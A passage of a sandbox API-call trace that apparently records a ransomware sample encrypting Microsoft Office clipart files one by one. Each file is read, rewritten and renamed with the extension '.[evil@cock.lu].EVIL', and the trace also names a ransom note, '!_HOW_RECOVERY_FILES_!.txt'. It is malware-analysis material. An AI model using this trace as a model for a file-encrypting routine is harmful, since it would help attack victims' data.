Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.148] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6928, lpOverlapped=0x0) returned 1 [0165.158] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.158] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.158] _errno () returned 0x84b1160840 [0165.158] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.159] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6940, lpOverlapped=0x0) returned 1 [0165.159] CloseHandle (hObject=0x1a8) returned 1 [0165.159] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.159] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.159] __uncaught_exception () returned 0x84b1160800 [0165.159] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.160] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf.[evil@cock.lu].evil")) returned 1 [0165.161] ??_V@YAXPEAX@Z () returned 0x1 [0165.165] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF", dwFileAttributes=0x200) returned 0 [0165.165] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.165] wcsstr (_Str="PE02282_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.165] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF") returned 69 [0165.165] wcscmp (_String1="PE02282_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.165] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02282_.WMF") returned 0x0 [0165.165] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF") returned 0x45 [0165.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.167] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7400, lpOverlapped=0x0) returned 1 [0165.187] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.187] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.187] _errno () returned 0x84b1160840 [0165.187] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.187] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x7420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7420, lpOverlapped=0x0) returned 1 [0165.187] CloseHandle (hObject=0x1a8) returned 1 [0165.187] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.188] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.188] __uncaught_exception () returned 0x84b1160800 [0165.188] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.188] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf.[evil@cock.lu].evil")) returned 1 [0165.189] ??_V@YAXPEAX@Z () returned 0x1 [0165.193] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF", dwFileAttributes=0x200) returned 0 [0165.193] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.193] wcsstr (_Str="PE02285_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.193] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF") returned 69 [0165.193] wcscmp (_String1="PE02285_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.193] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02285_.WMF") returned 0x0 [0165.193] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF") returned 0x45 [0165.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.196] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4090, lpOverlapped=0x0) returned 1 [0165.212] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.212] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.212] _errno () returned 0x84b1160840 [0165.212] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.212] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x40a0, lpOverlapped=0x0) returned 1 [0165.212] CloseHandle (hObject=0x1a8) returned 1 [0165.213] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.213] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.213] __uncaught_exception () returned 0x84b1160800 [0165.213] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.213] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf.[evil@cock.lu].evil")) returned 1 [0165.214] ??_V@YAXPEAX@Z () returned 0x1 [0165.218] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF", dwFileAttributes=0x200) returned 0 [0165.218] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.218] wcsstr (_Str="PE02287_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.218] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF") returned 69 [0165.218] wcscmp (_String1="PE02287_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.218] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02287_.WMF") returned 0x0 [0165.218] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF") returned 0x45 [0165.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.221] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4584, lpOverlapped=0x0) returned 1 [0165.230] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.230] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.231] _errno () returned 0x84b1160840 [0165.231] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.231] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x45a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45a0, lpOverlapped=0x0) returned 1 [0165.231] CloseHandle (hObject=0x1a8) returned 1 [0165.231] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.231] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.231] __uncaught_exception () returned 0x84b1160800 [0165.231] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.232] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf.[evil@cock.lu].evil")) returned 1 [0165.233] ??_V@YAXPEAX@Z () returned 0x1 [0165.236] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF", dwFileAttributes=0x200) returned 0 [0165.236] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.236] wcsstr (_Str="PE02288_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.236] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF") returned 69 [0165.236] wcscmp (_String1="PE02288_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.236] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02288_.WMF") returned 0x0 [0165.236] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF") returned 0x45 [0165.237] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.239] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x76e0, lpOverlapped=0x0) returned 1 [0165.248] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.248] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.248] _errno () returned 0x84b1160840 [0165.248] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.248] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x7700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7700, lpOverlapped=0x0) returned 1 [0165.248] CloseHandle (hObject=0x1a8) returned 1 [0165.248] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.249] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.249] __uncaught_exception () returned 0x84b1160800 [0165.249] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.249] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf.[evil@cock.lu].evil")) returned 1 [0165.250] ??_V@YAXPEAX@Z () returned 0x1 [0165.254] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF", dwFileAttributes=0x200) returned 0 [0165.254] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.254] wcsstr (_Str="PE02293_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.254] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF") returned 69 [0165.254] wcscmp (_String1="PE02293_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.254] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02293_.WMF") returned 0x0 [0165.254] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF") returned 0x45 [0165.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.257] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5850, lpOverlapped=0x0) returned 1 [0165.277] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.277] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.277] _errno () returned 0x84b1160840 [0165.278] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.278] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x5860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5860, lpOverlapped=0x0) returned 1 [0165.278] CloseHandle (hObject=0x1a8) returned 1 [0165.278] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.278] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.278] __uncaught_exception () returned 0x84b1160800 [0165.278] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.279] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf.[evil@cock.lu].evil")) returned 1 [0165.280] ??_V@YAXPEAX@Z () returned 0x1 [0165.283] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF", dwFileAttributes=0x200) returned 0 [0165.283] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.283] wcsstr (_Str="PE02296_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.283] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF") returned 69 [0165.283] wcscmp (_String1="PE02296_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.284] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02296_.WMF") returned 0x0 [0165.284] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF") returned 0x45 [0165.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.286] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5328, lpOverlapped=0x0) returned 1 [0165.296] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.296] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.296] _errno () returned 0x84b1160840 [0165.296] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.296] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x5340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5340, lpOverlapped=0x0) returned 1 [0165.296] CloseHandle (hObject=0x1a8) returned 1 [0165.296] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.296] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.296] __uncaught_exception () returned 0x84b1160800 [0165.296] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.297] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf.[evil@cock.lu].evil")) returned 1 [0165.298] ??_V@YAXPEAX@Z () returned 0x1 [0165.301] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF", dwFileAttributes=0x200) returned 0 [0165.302] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.302] wcsstr (_Str="PE02369_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.302] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF") returned 69 [0165.302] wcscmp (_String1="PE02369_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.302] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02369_.WMF") returned 0x0 [0165.302] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF") returned 0x45 [0165.302] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.304] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0165.313] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.313] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.313] _errno () returned 0x84b1160840 [0165.313] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.313] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8e0, lpOverlapped=0x0) returned 1 [0165.313] CloseHandle (hObject=0x1a8) returned 1 [0165.313] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.314] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.314] __uncaught_exception () returned 0x84b1160800 [0165.314] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.314] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf.[evil@cock.lu].evil")) returned 1 [0165.315] ??_V@YAXPEAX@Z () returned 0x1 [0165.319] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF", dwFileAttributes=0x200) returned 0 [0165.319] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.320] wcsstr (_Str="PE02522_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.320] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF") returned 69 [0165.320] wcscmp (_String1="PE02522_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.320] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02522_.WMF") returned 0x0 [0165.320] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF") returned 0x45 [0165.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.322] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, 